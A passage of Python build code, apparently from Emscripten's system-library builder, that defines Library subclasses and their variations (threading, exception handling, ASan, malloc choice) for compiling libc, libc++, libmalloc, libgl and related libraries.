* An abstract library, e.g. MTLibrary, is a subclass of `Library` that
implements certain behaviour common to multiple libraries. The features
of multiple abstract libraries can be used through multiple inheritance.
* A concrete library, e.g. libc, is a subclass of `Library` that describes
how to build a particular library, and its properties, such as name and
dependencies.
This library system is meant to handle having many versions of the same library,
which we call *variations*. For example, some libraries (those that inherit
from MTLibrary), have both single-threaded and multi-threaded versions.
An instance of a `Library` subclass represents a specific variation of the
library. Instance methods perform operations relating to this variation.
For example, `get_cflags()` would return the emcc flags needed to build this
variation, and `build()` would generate the library file for this variation.
The constructor takes keyword arguments that defines the variation.
Class methods perform tasks relating to all variations. For example,
`variations()` returns a list of all variations that exists for this library,
and `get_default_variation()` returns the variation suitable for the current
environment.
Other class methods act upon a group of libraries. For example,
`Library.get_all_variations()` returns a mapping of all variations of
existing libraries.
To add a new type of variation, you must add an parameter to `__init__` that
selects the variant. Then, override one of `vary_on` or `variations`, as well
as `get_default_variation`.
If the parameter is boolean, overriding `vary_on` to add the parameter name
to the returned list is sufficient:
@classmethod
def vary_on(cls):
return super().vary_on() + ['my_parameter']
Otherwise, you must override `variations`:
@classmethod
def variations(cls):
return [{'my_parameter': value, **other} for value, other in
itertools.product([1, 2, 3], super().variations())]
Overriding either `vary_on` or `variations` allows `embuilder.py` to know all
possible variations so it can build all of them.
You then need to modify `get_default_variation` to detect the correct value
for your new parameter based on the settings:
@classmethod
def get_default_variation(cls, **kwargs):
return super().get_default_variation(my_parameter=shared.Settings.MY_PARAMETER, **kwargs)
This allows the correct variation of the library to be selected when building
code with Emscripten.
"""
# The simple name of the library. When linking, this is the name to use to
# automatically get the correct version of the library.
# This should only be overridden in a concrete library class, e.g. libc,
# and left as None in an abstract library class, e.g. MTLibrary.
name = None
# A list of simple names of other libraries that this one depends on.
# For dynamic values, override `get_depends()` instead.
depends = []
# A set of symbols that this library exports. This will be set with a set
# returned by `read_symbols`.
symbols = set()
# A list of symbols that must be exported to keep the JavaScript
# dependencies of this library working.
js_depends = []
# Set to true to prevent EMCC_FORCE_STDLIBS from linking this library.
never_force = False
# The C compile executable to use. You can override this to shared.EMXX for C++.
emcc = shared.EMCC
# A list of flags to pass to emcc.
# The flags for the parent class is automatically inherited.
cflags = ['-Werror']
# A list of directories to put in the include path when building.
# This is a list of tuples of path components.
# For example, to put system/lib/a and system/lib/b under the emscripten
# directory into the include path, you would write:
# includes = [('system', 'lib', 'a'), ('system', 'lib', 'b')]
# The include path of the parent class is automatically inherited.
includes = []
# By default, `get_files` look for source files for this library under `src_dir`.
# It will either use the files listed in `src_files`, or use the glob pattern in
# `src_glob`. You may not specify both `src_files` and `src_glob`.
# When using `src_glob`, you can specify a list of files in `src_glob_exclude`
# to be excluded from the library.
# Alternatively, you can override `get_files` to use your own logic.
src_dir = None
src_files = None
src_glob = None
src_glob_exclude = None
# Whether to always generate WASM object files, even when LTO is set
force_object_files = False
def __init__(self):
"""
Creates a variation of this library.
A variation is a specific combination of settings a library can have.
For example, libc++-mt-noexcept is a variation of libc++.
There might be only one variation of a library.
The constructor keyword arguments will define what variation to use.
Use the `variations` classmethod to get the list of all possible constructor
arguments for this library.
Use the `get_default_variation` classmethod to construct the variation
suitable for the current invocation of emscripten.
"""
if not self.name:
raise NotImplementedError('Cannot instantiate an abstract library')
# Read .symbols file if it exists. This first tries to read a symbols file
# with the same basename with the library file name (e.g.
# libc++-mt.symbols), and if there isn't one, it tries to read the 'default'
# symbol file, which does not have any optional suffices (e.g.
# libc++.symbols).
basename = os.path.splitext(self.get_filename())[0]
if shared.Settings.WASM_BACKEND:
symbols_dir = shared.path_from_root('system', 'lib', 'symbols', 'wasm')
else:
symbols_dir = shared.path_from_root('system', 'lib', 'symbols', 'asmjs')
symbols_file = os.path.join(symbols_dir, basename + '.symbols')
default_symbols_file = os.path.join(symbols_dir, self.name + '.symbols')
if os.path.isfile(symbols_file):
self.symbols = read_symbols(symbols_file)
elif os.path.isfile(default_symbols_file):
self.symbols = read_symbols(default_symbols_file)
def in_temp(cls, *args):
"""Gets the path of a file in our temporary directory."""
return os.path.join(shared.get_emscripten_temp_dir(), *args)
def can_use(self):
"""
Whether this library can be used in the current environment.
For example, libmalloc would override this and return False
if the user requested no malloc.
"""
return True
def can_build(self):
"""
Whether this library can be built in the current environment.
Override this if, for example, the library can only be built on WASM backend.
"""
return True
def erase(self):
shared.Cache.erase_file(self.get_filename())
def get_path(self):
"""
Gets the cached path of this library.
This will trigger a build if this library is not in the cache.
"""
return shared.Cache.get(self.get_filename(), self.build)
def get_files(self):
"""
Gets a list of source files for this library.
Typically, you will use `src_dir`, `src_files`, `src_glob` and `src_glob_exclude`.
If those are insufficient to describe the files needed, you can override this method.
"""
if self.src_dir:
if self.src_files and self.src_glob:
raise Exception('Cannot use src_files and src_glob together')
if self.src_files:
return files_in_path(self.src_dir, self.src_files)
elif self.src_glob:
return glob_in_path(self.src_dir, self.src_glob, self.src_glob_exclude or ())
raise NotImplementedError()
def build_objects(self):
"""
Returns a list of compiled object files for this library.
By default, this builds all the source files returned by `self.get_files()`,
with the `cflags` returned by `self.get_cflags()`.
"""
commands = []
objects = []
cflags = self.get_cflags()
for src in self.get_files():
o = self.in_temp(os.path.basename(src) + '.o')
commands.append([shared.PYTHON, self.emcc, '-c', src, '-o', o] + cflags)
objects.append(o)
run_build_commands(commands)
return objects
def build(self):
"""Builds the library and returns the path to the file."""
out_filename = self.in_temp(self.get_filename())
create_lib(out_filename, self.build_objects())
return out_filename
@classmethod
def _inherit_list(cls, attr):
# Some properties, like cflags and includes, makes more sense to inherit
# via concatenation than replacement.
result = []
for item in cls.__mro__[::-1]:
# Using __dict__ to avoid inheritance
result += item.__dict__.get(attr, [])
return result
def get_cflags(self):
"""
Returns the list of flags to pass to emcc when building this variation
of the library.
Override and add any flags as needed to handle new variations.
"""
cflags = self._inherit_list('cflags')
cflags += get_cflags(force_object_files=self.force_object_files)
if self.includes:
cflags += ['-I' + shared.path_from_root(*path) for path in self._inherit_list('includes')]
return cflags
def get_base_name_prefix(self):
"""
Returns the base name of the library without any suffixes.
"""
return self.name
def get_base_name(self):
"""
Returns the base name of the library file.
This will include suffixes such as -mt, but will not include a file extension.
"""
return self.get_base_name_prefix()
def get_ext(self):
"""
Return the appropriate file extension for this library.
"""
return static_library_ext()
def get_filename(self):
"""
Return the full name of the library file, including the file extension.
"""
return self.get_base_name() + self.get_ext()
def get_depends(self):
"""
Return a list of simple names of libraries that this library depends on.
This is the dynamic version of `depends`.
"""
return self.depends
@classmethod
def vary_on(cls):
"""
Returns a list of strings that are the names of boolean constructor
arguments that defines the variations of this library.
This is used by the default implementation of `cls.variations()` to generate
every possible combination of boolean values to pass to these arguments.
"""
return []
@classmethod
def variations(cls):
"""
Returns a list of keyword arguments to pass to the constructor to create
every possible variation of this library.
By default, this is every possible combination of boolean values to pass
to the list of arguments returned by `vary_on`, but you can override
the behaviour.
"""
vary_on = cls.vary_on()
return [dict(zip(vary_on, toggles)) for toggles in
itertools.product([False, True], repeat=len(vary_on))]
@classmethod
def get_default_variation(cls, **kwargs):
"""
Construct the variation suitable for the current invocation of emscripten.
Subclasses should pass the keyword arguments they introduce to the
superclass version, and propagate **kwargs. The base class collects
all the keyword arguments and creates the instance.
"""
return cls(**kwargs)
@classmethod
def get_inheritance_tree(cls):
"""Returns all the classes in the inheritance tree of the current class."""
yield cls
for subclass in cls.__subclasses__():
for subclass in subclass.get_inheritance_tree():
yield subclass
@classmethod
def get_all_variations(cls):
"""
Gets all the variations of libraries in the inheritance tree of the current
library.
Calling Library.get_all_variations() returns the variations of ALL libraries
that can be built as a dictionary of variation names to Library objects.
"""
result = {}
for library in cls.get_inheritance_tree():
if library.name:
for flags in library.variations():
variation = library(**flags)
if variation.can_build():
result[variation.get_base_name()] = variation
return result
@classmethod
def get_usable_variations(cls):
"""
Gets all libraries suitable for the current invocation of emscripten.
This returns a dictionary of simple names to Library objects.
"""
result = {}
for subclass in cls.get_inheritance_tree():
if subclass.name:
library = subclass.get_default_variation()
if library.can_build() and library.can_use():
result[subclass.name] = library
return result
class MTLibrary(Library):
def __init__(self, **kwargs):
self.is_mt = kwargs.pop('is_mt')
super(MTLibrary, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(MTLibrary, self).get_cflags()
if self.is_mt:
cflags += ['-s', 'USE_PTHREADS=1', '-DUSE_THREADS']
return cflags
def get_base_name(self):
name = super(MTLibrary, self).get_base_name()
if self.is_mt:
name += '-mt'
return name
@classmethod
def vary_on(cls):
return super(MTLibrary, cls).vary_on() + ['is_mt']
@classmethod
def get_default_variation(cls, **kwargs):
return super(MTLibrary, cls).get_default_variation(is_mt=shared.Settings.USE_PTHREADS, **kwargs)
class exceptions(object):
"""
This represents exception handling mode of Emscripten. Currently there are
three modes of exception handling:
- None: Does not handle exceptions. This includes -fno-exceptions, which
prevents both throwing and catching, and -fignore-exceptions, which only
allows throwing, but library-wise they use the same version.
- Emscripten: Emscripten provides exception handling capability using JS
emulation. This causes code size increase and performance degradation.
- Wasm: Wasm native exception handling support uses Wasm EH instructions and
is meant to be fast. You need to use a VM that has the EH support to use
this. This is not fully working yet and still experimental.
"""
none = 0
emscripten = 1
wasm = 2
class NoExceptLibrary(Library):
def __init__(self, **kwargs):
self.eh_mode = kwargs.pop('eh_mode')
super(NoExceptLibrary, self).__init__(**kwargs)
def can_build(self):
if not super(NoExceptLibrary, self).can_build():
return False
# Wasm exception handling is only supported in the wasm backend
return shared.Settings.WASM_BACKEND or self.eh_mode != exceptions.wasm
def can_use(self):
if not super(NoExceptLibrary, self).can_use():
return False
# Wasm exception handling is only supported in the wasm backend
return shared.Settings.WASM_BACKEND or self.eh_mode != exceptions.wasm
def get_cflags(self):
cflags = super(NoExceptLibrary, self).get_cflags()
if self.eh_mode == exceptions.none:
cflags += ['-fno-exceptions']
elif self.eh_mode == exceptions.emscripten:
cflags += ['-s', 'DISABLE_EXCEPTION_CATCHING=0']
elif self.eh_mode == exceptions.wasm:
cflags += ['-fwasm-exceptions']
return cflags
def get_base_name(self):
name = super(NoExceptLibrary, self).get_base_name()
# TODO Currently emscripten-based exception is the default mode, thus no
# suffixes. Change the default to wasm exception later.
if self.eh_mode == exceptions.none:
name += '-noexcept'
elif self.eh_mode == exceptions.wasm:
name += '-except'
return name
@classmethod
def variations(cls, **kwargs):
combos = super(NoExceptLibrary, cls).variations()
return ([dict(eh_mode=exceptions.none, **combo) for combo in combos] +
[dict(eh_mode=exceptions.emscripten, **combo) for combo in combos] +
[dict(eh_mode=exceptions.wasm, **combo) for combo in combos])
@classmethod
def get_default_variation(cls, **kwargs):
if shared.Settings.EXCEPTION_HANDLING:
eh_mode = exceptions.wasm
elif shared.Settings.DISABLE_EXCEPTION_CATCHING == 1:
eh_mode = exceptions.none
else:
eh_mode = exceptions.emscripten
return super(NoExceptLibrary, cls).get_default_variation(eh_mode=eh_mode, **kwargs)
class MuslInternalLibrary(Library):
includes = [
['system', 'lib', 'libc', 'musl', 'src', 'internal'],
]
cflags = [
'-D_XOPEN_SOURCE=700',
'-Wno-unused-result', # system call results are often ignored in musl, and in wasi that warns
]
class AsanInstrumentedLibrary(Library):
def __init__(self, **kwargs):
self.is_asan = kwargs.pop('is_asan', False)
super(AsanInstrumentedLibrary, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(AsanInstrumentedLibrary, self).get_cflags()
if self.is_asan:
cflags += ['-fsanitize=address']
return cflags
def get_base_name(self):
name = super(AsanInstrumentedLibrary, self).get_base_name()
if self.is_asan:
name += '-asan'
return name
@classmethod
def vary_on(cls):
vary_on = super(AsanInstrumentedLibrary, cls).vary_on()
if shared.Settings.WASM_BACKEND:
vary_on += ['is_asan']
return vary_on
@classmethod
def get_default_variation(cls, **kwargs):
return super(AsanInstrumentedLibrary, cls).get_default_variation(is_asan=shared.Settings.USE_ASAN, **kwargs)
class CXXLibrary(Library):
emcc = shared.EMXX
class NoBCLibrary(Library):
# Some libraries cannot be compiled as .bc files. This is because .bc files will link in every
# object in the library. While the optimizer will readily optimize out most of the unused
# functions, things like global constructors that are linked in cannot be optimized out, even
# though they are not actually needed. If we use .a files for such libraries, only the object
# files, and by extension, their contained global constructors, that are actually needed will be
# linked in.
def get_ext(self):
return '.a'
class libcompiler_rt(Library):
name = 'libcompiler_rt'
# compiler_rt files can't currently be part of LTO although we are hoping to remove this
# restriction soon: https://reviews.llvm.org/D71738
force_object_files = True
cflags = ['-O2', '-fno-builtin']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'builtins']
if shared.Settings.WASM_BACKEND:
filelist = shared.path_from_root('system', 'lib', 'compiler-rt', 'filelist.txt')
src_files = open(filelist).read().splitlines()
src_files.append(shared.path_from_root('system', 'lib', 'compiler-rt', 'extras.c'))
else:
src_files = ['divdc3.c', 'divsc3.c', 'muldc3.c', 'mulsc3.c']
class libc(AsanInstrumentedLibrary, MuslInternalLibrary, MTLibrary):
name = 'libc'
depends = ['libcompiler_rt']
# Without -fno-builtin, LLVM can optimize away or convert calls to library
# functions to something else based on assumptions that they behave exactly
# like the standard library. This can cause unexpected bugs when we use our
# custom standard library. The same for other libc/libm builds.
cflags = ['-Os', '-fno-builtin']
# Hide several musl warnings that produce a lot of spam to unit test build
# server logs. TODO: When updating musl the next time, feel free to recheck
# which of their warnings might have been fixed, and which ones of these could
# be cleaned up.
cflags += ['-Wno-return-type', '-Wno-parentheses', '-Wno-ignored-attributes',
'-Wno-shift-count-overflow', '-Wno-shift-negative-value',
'-Wno-dangling-else', '-Wno-unknown-pragmas',
'-Wno-shift-op-parentheses', '-Wno-string-plus-int',
'-Wno-logical-op-parentheses', '-Wno-bitwise-op-parentheses',
'-Wno-visibility', '-Wno-pointer-sign', '-Wno-absolute-value',
'-Wno-empty-body']
def get_files(self):
libc_files = []
musl_srcdir = shared.path_from_root('system', 'lib', 'libc', 'musl', 'src')
# musl modules
blacklist = [
'ipc', 'passwd', 'thread', 'signal', 'sched', 'ipc', 'time', 'linux',
'aio', 'exit', 'legacy', 'mq', 'process', 'search', 'setjmp', 'env',
'ldso', 'conf'
]
# individual files
blacklist += [
'memcpy.c', 'memset.c', 'memmove.c', 'getaddrinfo.c', 'getnameinfo.c',
'inet_addr.c', 'res_query.c', 'res_querydomain.c', 'gai_strerror.c',
'proto.c', 'gethostbyaddr.c', 'gethostbyaddr_r.c', 'gethostbyname.c',
'gethostbyname2_r.c', 'gethostbyname_r.c', 'gethostbyname2.c',
'usleep.c', 'alarm.c', 'syscall.c', '_exit.c', 'popen.c',
'getgrouplist.c', 'initgroups.c', 'wordexp.c', 'timer_create.c',
'faccessat.c',
]
blacklist += LIBC_SOCKETS
# individual math files
blacklist += [
'abs.c', 'cos.c', 'cosf.c', 'cosl.c', 'sin.c', 'sinf.c', 'sinl.c',
'tan.c', 'tanf.c', 'tanl.c', 'acos.c', 'acosf.c', 'acosl.c', 'asin.c',
'asinf.c', 'asinl.c', 'atan.c', 'atanf.c', 'atanl.c', 'atan2.c',
'atan2f.c', 'atan2l.c', 'exp.c', 'expf.c', 'expl.c', 'log.c', 'logf.c',
'logl.c', 'sqrtl.c', 'round.c', 'roundf.c',
'fabsl.c', 'ceill.c', 'floorl.c', 'pow.c', 'powf.c', 'powl.c',
]
if self.is_asan:
# With ASan, we need to use specialized implementations of certain libc
# functions that do not rely on undefined behavior, for example, reading
# multiple bytes at once as an int and overflowing a buffer.
# Otherwise, ASan will catch these errors and terminate the program.
blacklist += ['strcpy.c', 'memchr.c', 'strchrnul.c', 'strlen.c',
'aligned_alloc.c', 'fcntl.c']
libc_files += [
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strcpy.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_memchr.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strchrnul.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_strlen.c'),
shared.path_from_root('system', 'lib', 'libc', 'emscripten_asan_fcntl.c'),
]
if shared.Settings.WASM_BACKEND:
# With the wasm backend these are included in wasm_libc_rt instead
blacklist += [os.path.basename(f) for f in get_wasm_libc_rt_files()]
else:
blacklist += ['rintf.c', 'ceil.c', 'ceilf.c', 'floor.c', 'floorf.c',
'fabs.c', 'fabsf.c', 'sqrt.c', 'sqrtf.c']
blacklist = set(blacklist)
# TODO: consider using more math code from musl, doing so makes box2d faster
for dirpath, dirnames, filenames in os.walk(musl_srcdir):
for f in filenames:
if f.endswith('.c'):
if f in blacklist:
continue
dir_parts = os.path.split(dirpath)
cancel = False
for part in dir_parts:
if part in blacklist:
cancel = True
break
if not cancel:
libc_files.append(os.path.join(musl_srcdir, dirpath, f))
# Allowed files from blacklisted modules
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'time'],
filenames=['clock_settime.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'legacy'],
filenames=['getpagesize.c'])
if shared.Settings.WASM_BACKEND:
# See libc_extras below
# Include all the getenv stuff with the wasm backend. With fastcomp we
# still use JS because libc is a .bc file and we don't want to have a
# global constructor there for __environ, which would mean it is always
# included.
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'env'],
filenames=['__environ.c', 'getenv.c', 'putenv.c', 'setenv.c', 'unsetenv.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'sched'],
filenames=['sched_yield.c'])
libc_files += files_in_path(
path_components=['system', 'lib', 'libc'],
filenames=['extras.c', 'wasi-helpers.c'])
return libc_files
def get_depends(self):
depends = super(libc, self).get_depends()
if shared.Settings.WASM:
return depends + ['libc-wasm']
return depends
class libsockets(MuslInternalLibrary, MTLibrary):
name = 'libsockets'
symbols = set()
cflags = ['-Os', '-fno-builtin']
def get_files(self):
network_dir = shared.path_from_root('system', 'lib', 'libc', 'musl', 'src', 'network')
return [os.path.join(network_dir, x) for x in LIBC_SOCKETS]
class libsockets_proxy(MuslInternalLibrary, MTLibrary):
name = 'libsockets_proxy'
symbols = set()
cflags = ['-Os']
def get_files(self):
return [shared.path_from_root('system', 'lib', 'websocket', 'websocket_to_posix_socket.cpp'),
shared.path_from_root('system', 'lib', 'libc', 'musl', 'src', 'network', 'inet_addr.c')]
class libc_wasm(MuslInternalLibrary):
name = 'libc-wasm'
cflags = ['-O2', '-fno-builtin']
src_dir = ['system', 'lib', 'libc', 'musl', 'src', 'math']
src_files = ['cos.c', 'cosf.c', 'cosl.c', 'sin.c', 'sinf.c', 'sinl.c',
'tan.c', 'tanf.c', 'tanl.c', 'acos.c', 'acosf.c', 'acosl.c',
'asin.c', 'asinf.c', 'asinl.c', 'atan.c', 'atanf.c', 'atanl.c',
'atan2.c', 'atan2f.c', 'atan2l.c', 'exp.c', 'expf.c', 'expl.c',
'log.c', 'logf.c', 'logl.c', 'pow.c', 'powf.c', 'powl.c',
'sqrtl.c', 'ceill.c', 'floorl.c', 'fabsl.c']
def can_use(self):
# if building to wasm, we need more math code, since we have fewer builtins
return super(libc_wasm, self).can_use() and shared.Settings.WASM
class crt1(MuslInternalLibrary):
name = 'crt1'
cflags = ['-O2']
src_dir = ['system', 'lib', 'libc']
src_files = ['crt1.c']
force_object_files = True
def get_ext(self):
return '.o'
def can_use(self):
return super(crt1, self).can_use() and shared.Settings.STANDALONE_WASM
def can_build(self):
return super(crt1, self).can_build() and shared.Settings.WASM_BACKEND
class libc_extras(MuslInternalLibrary):
"""This library is separate from libc itself for fastcomp only so that the
constructor it contains can be DCE'd. Such tricks are not needed wih the
the wasm backend because it uses .o file linking granularity.
"""
name = 'libc-extras'
src_dir = ['system', 'lib', 'libc']
src_files = ['extras_fastcomp.c']
def can_build(self):
return super(libc_extras, self).can_build() and not shared.Settings.WASM_BACKEND
class libcxxabi(CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libc++abi'
cflags = [
'-Oz',
'-D_LIBCPP_DISABLE_VISIBILITY_ANNOTATIONS',
# Remove this once we update to include this llvm
# revision: https://reviews.llvm.org/D64961
'-D_LIBCXXABI_GUARD_ABI_ARM',
]
def get_depends(self):
if self.eh_mode == exceptions.wasm:
return ['libc', 'libunwind']
return ['libc']
def get_cflags(self):
cflags = super(libcxxabi, self).get_cflags()
cflags.append('-DNDEBUG')
if not self.is_mt:
cflags.append('-D_LIBCXXABI_HAS_NO_THREADS')
if self.eh_mode == exceptions.none:
cflags.append('-D_LIBCXXABI_NO_EXCEPTIONS')
elif self.eh_mode == exceptions.emscripten:
cflags.append('-D__USING_EMSCRIPTEN_EXCEPTIONS__')
elif self.eh_mode == exceptions.wasm:
cflags.append('-D__USING_WASM_EXCEPTIONS__')
return cflags
def get_files(self):
filenames = [
'abort_message.cpp',
'cxa_aux_runtime.cpp',
'cxa_default_handlers.cpp',
'cxa_demangle.cpp',
'cxa_exception_storage.cpp',
'cxa_guard.cpp',
'cxa_handlers.cpp',
'cxa_virtual.cpp',
'fallback_malloc.cpp',
'stdlib_new_delete.cpp',
'stdlib_exception.cpp',
'stdlib_stdexcept.cpp',
'stdlib_typeinfo.cpp',
'private_typeinfo.cpp'
]
if self.eh_mode == exceptions.none:
filenames += ['cxa_noexception.cpp']
elif self.eh_mode == exceptions.wasm:
filenames += [
'cxa_exception.cpp',
'cxa_noexception.cpp',
'cxa_personality.cpp'
]
return files_in_path(
path_components=['system', 'lib', 'libcxxabi', 'src'],
filenames=filenames)
class libcxx(NoBCLibrary, CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libc++'
depends = ['libc++abi']
cflags = ['-DLIBCXX_BUILDING_LIBCXXABI=1', '-D_LIBCPP_BUILDING_LIBRARY', '-Oz',
'-D_LIBCPP_DISABLE_VISIBILITY_ANNOTATIONS']
src_dir = ['system', 'lib', 'libcxx']
src_files = [
'algorithm.cpp',
'any.cpp',
'bind.cpp',
'charconv.cpp',
'chrono.cpp',
'condition_variable.cpp',
'condition_variable_destructor.cpp',
'debug.cpp',
'exception.cpp',
'functional.cpp',
'future.cpp',
'hash.cpp',
'ios.cpp',
'iostream.cpp',
'locale.cpp',
'memory.cpp',
'mutex.cpp',
'mutex_destructor.cpp',
'new.cpp',
'optional.cpp',
'random.cpp',
'regex.cpp',
'shared_mutex.cpp',
'stdexcept.cpp',
'string.cpp',
'strstream.cpp',
'system_error.cpp',
'thread.cpp',
'typeinfo.cpp',
'utility.cpp',
'valarray.cpp',
'variant.cpp',
'vector.cpp',
os.path.join('experimental', 'memory_resource.cpp'),
os.path.join('filesystem', 'directory_iterator.cpp'),
os.path.join('filesystem', 'int128_builtins.cpp'),
os.path.join('filesystem', 'operations.cpp')
]
class libunwind(CXXLibrary, NoExceptLibrary, MTLibrary):
name = 'libunwind'
cflags = ['-Oz', '-D_LIBUNWIND_DISABLE_VISIBILITY_ANNOTATIONS']
src_dir = ['system', 'lib', 'libunwind', 'src']
src_files = ['Unwind-wasm.cpp']
def __init__(self, **kwargs):
super(libunwind, self).__init__(**kwargs)
def can_build(self):
return super(libunwind, self).can_build() and shared.Settings.WASM_BACKEND
def can_use(self):
return super(libunwind, self).can_use() and shared.Settings.WASM_BACKEND and self.eh_mode == exceptions.wasm
def get_cflags(self):
cflags = super(libunwind, self).get_cflags()
cflags.append('-DNDEBUG')
if not self.is_mt:
cflags.append('-D_LIBUNWIND_HAS_NO_THREADS')
if self.eh_mode == exceptions.none:
cflags.append('-D_LIBUNWIND_HAS_NO_EXCEPTIONS')
elif self.eh_mode == exceptions.emscripten:
cflags.append('-D__USING_EMSCRIPTEN_EXCEPTIONS__')
elif self.eh_mode == exceptions.wasm:
cflags.append('-D__USING_WASM_EXCEPTIONS__')
return cflags
class libmalloc(MTLibrary, NoBCLibrary):
name = 'libmalloc'
cflags = ['-O2', '-fno-builtin']
def __init__(self, **kwargs):
self.malloc = kwargs.pop('malloc')
if self.malloc not in ('dlmalloc', 'emmalloc', 'none'):
raise Exception('malloc must be one of "emmalloc", "dlmalloc" or "none", see settings.js')
self.is_debug = kwargs.pop('is_debug')
self.use_errno = kwargs.pop('use_errno')
self.is_tracing = kwargs.pop('is_tracing')
self.use_64bit_ops = kwargs.pop('use_64bit_ops')
super(libmalloc, self).__init__(**kwargs)
def get_files(self):
malloc = shared.path_from_root('system', 'lib', {
'dlmalloc': 'dlmalloc.c', 'emmalloc': 'emmalloc.cpp'
}[self.malloc])
sbrk = shared.path_from_root('system', 'lib', 'sbrk.c')
return [malloc, sbrk]
def get_cflags(self):
cflags = super(libmalloc, self).get_cflags()
if self.is_debug:
cflags += ['-UNDEBUG', '-DDLMALLOC_DEBUG']
# TODO: consider adding -DEMMALLOC_DEBUG, but that is quite slow
else:
cflags += ['-DNDEBUG']
if not self.use_errno:
cflags += ['-DMALLOC_FAILURE_ACTION=', '-DEMSCRIPTEN_NO_ERRNO']
if self.is_tracing:
cflags += ['--tracing']
if self.use_64bit_ops:
cflags += ['-DEMMALLOC_USE_64BIT_OPS=1']
return cflags
def get_base_name_prefix(self):
return 'lib%s' % self.malloc
def get_base_name(self):
name = super(libmalloc, self).get_base_name()
if self.is_debug:
name += '-debug'
if not self.use_errno:
# emmalloc doesn't actually use errno, but it's easier to build it again
name += '-noerrno'
if self.is_tracing:
name += '-tracing'
if self.use_64bit_ops:
name += '-64bit'
return name
def can_use(self):
return super(libmalloc, self).can_use() and shared.Settings.MALLOC != 'none'
@classmethod
def vary_on(cls):
return super(libmalloc, cls).vary_on() + ['is_debug', 'use_errno', 'is_tracing', 'use_64bit_ops']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libmalloc, cls).get_default_variation(
malloc=shared.Settings.MALLOC,
is_debug=shared.Settings.DEBUG_LEVEL >= 3,
use_errno=shared.Settings.SUPPORT_ERRNO,
is_tracing=shared.Settings.EMSCRIPTEN_TRACING,
use_64bit_ops=shared.Settings.MALLOC == 'emmalloc' and (shared.Settings.WASM == 1 or (shared.Settings.WASM_BACKEND and shared.Settings.WASM2JS == 0)),
**kwargs
)
@classmethod
def variations(cls):
combos = super(libmalloc, cls).variations()
return ([dict(malloc='dlmalloc', **combo) for combo in combos if not combo['use_64bit_ops']] +
[dict(malloc='emmalloc', **combo) for combo in combos])
class libal(Library):
name = 'libal'
depends = ['libc']
cflags = ['-Os']
src_dir = ['system', 'lib']
src_files = ['al.c']
class libgl(MTLibrary):
name = 'libgl'
depends = ['libc']
src_dir = ['system', 'lib', 'gl']
src_glob = '*.c'
cflags = ['-Oz']
def __init__(self, **kwargs):
self.is_legacy = kwargs.pop('is_legacy')
self.is_webgl2 = kwargs.pop('is_webgl2')
self.is_ofb = kwargs.pop('is_ofb')
self.is_full_es3 = kwargs.pop('is_full_es3')
super(libgl, self).__init__(**kwargs)
def get_base_name(self):
name = super(libgl, self).get_base_name()
if self.is_legacy:
name += '-emu'
if self.is_webgl2:
name += '-webgl2'
if self.is_ofb:
name += '-ofb'
if self.is_full_es3:
name += '-full_es3'
return name
def get_cflags(self):
cflags = super(libgl, self).get_cflags()
if self.is_legacy:
cflags += ['-DLEGACY_GL_EMULATION=1']
if self.is_webgl2:
cflags += ['-DMAX_WEBGL_VERSION=2', '-s', 'MAX_WEBGL_VERSION=2']
if self.is_ofb:
cflags += ['-D__EMSCRIPTEN_OFFSCREEN_FRAMEBUFFER__']
if self.is_full_es3:
cflags += ['-D__EMSCRIPTEN_FULL_ES3__']
return cflags
@classmethod
def vary_on(cls):
return super(libgl, cls).vary_on() + ['is_legacy', 'is_webgl2', 'is_ofb', 'is_full_es3']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libgl, cls).get_default_variation(
is_legacy=shared.Settings.LEGACY_GL_EMULATION,
is_webgl2=shared.Settings.MAX_WEBGL_VERSION >= 2,
is_ofb=shared.Settings.OFFSCREEN_FRAMEBUFFER,
is_full_es3=shared.Settings.FULL_ES3,
**kwargs
)
class libembind(CXXLibrary):
name = 'libembind'
depends = ['libc++abi']
never_force = True
def __init__(self, **kwargs):
self.with_rtti = kwargs.pop('with_rtti', False)
super(libembind, self).__init__(**kwargs)
def get_cflags(self):
cflags = super(libembind, self).get_cflags()
if not self.with_rtti:
cflags += ['-fno-rtti', '-DEMSCRIPTEN_HAS_UNBOUND_TYPE_NAMES=0']
return cflags
@classmethod
def vary_on(cls):
return super(libembind, cls).vary_on() + ['with_rtti']
def get_base_name(self):
name = super(libembind, self).get_base_name()
if self.with_rtti:
name += '-rtti'
return name
def get_files(self):
return [shared.path_from_root('system', 'lib', 'embind', 'bind.cpp')]
@classmethod
def get_default_variation(cls, **kwargs):
return super(libembind, cls).get_default_variation(with_rtti=shared.Settings.USE_RTTI, **kwargs)
class libfetch(CXXLibrary, MTLibrary):
name = 'libfetch'
depends = ['libc++abi']
never_force = True
def get_files(self):
return [shared.path_from_root('system', 'lib', 'fetch', 'emscripten_fetch.cpp')]
class libasmfs(CXXLibrary, MTLibrary):
name = 'libasmfs'
depends = ['libc++abi']
never_force = True
def get_files(self):
return [shared.path_from_root('system', 'lib', 'fetch', 'asmfs.cpp')]
def can_build(self):
# ASMFS is looking for a maintainer
# https://github.com/emscripten-core/emscripten/issues/9534
return True
class libhtml5(Library):
name = 'libhtml5'
cflags = ['-Oz']
src_dir = ['system', 'lib', 'html5']
src_glob = '*.c'
class libpthread(AsanInstrumentedLibrary, MuslInternalLibrary, MTLibrary):
name = 'libpthread'
depends = ['libc']
cflags = ['-O2']
def get_files(self):
if self.is_mt:
files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'thread'],
filenames=[
'pthread_attr_destroy.c', 'pthread_condattr_setpshared.c',
'pthread_mutex_lock.c', 'pthread_spin_destroy.c', 'pthread_attr_get.c',
'pthread_cond_broadcast.c', 'pthread_mutex_setprioceiling.c',
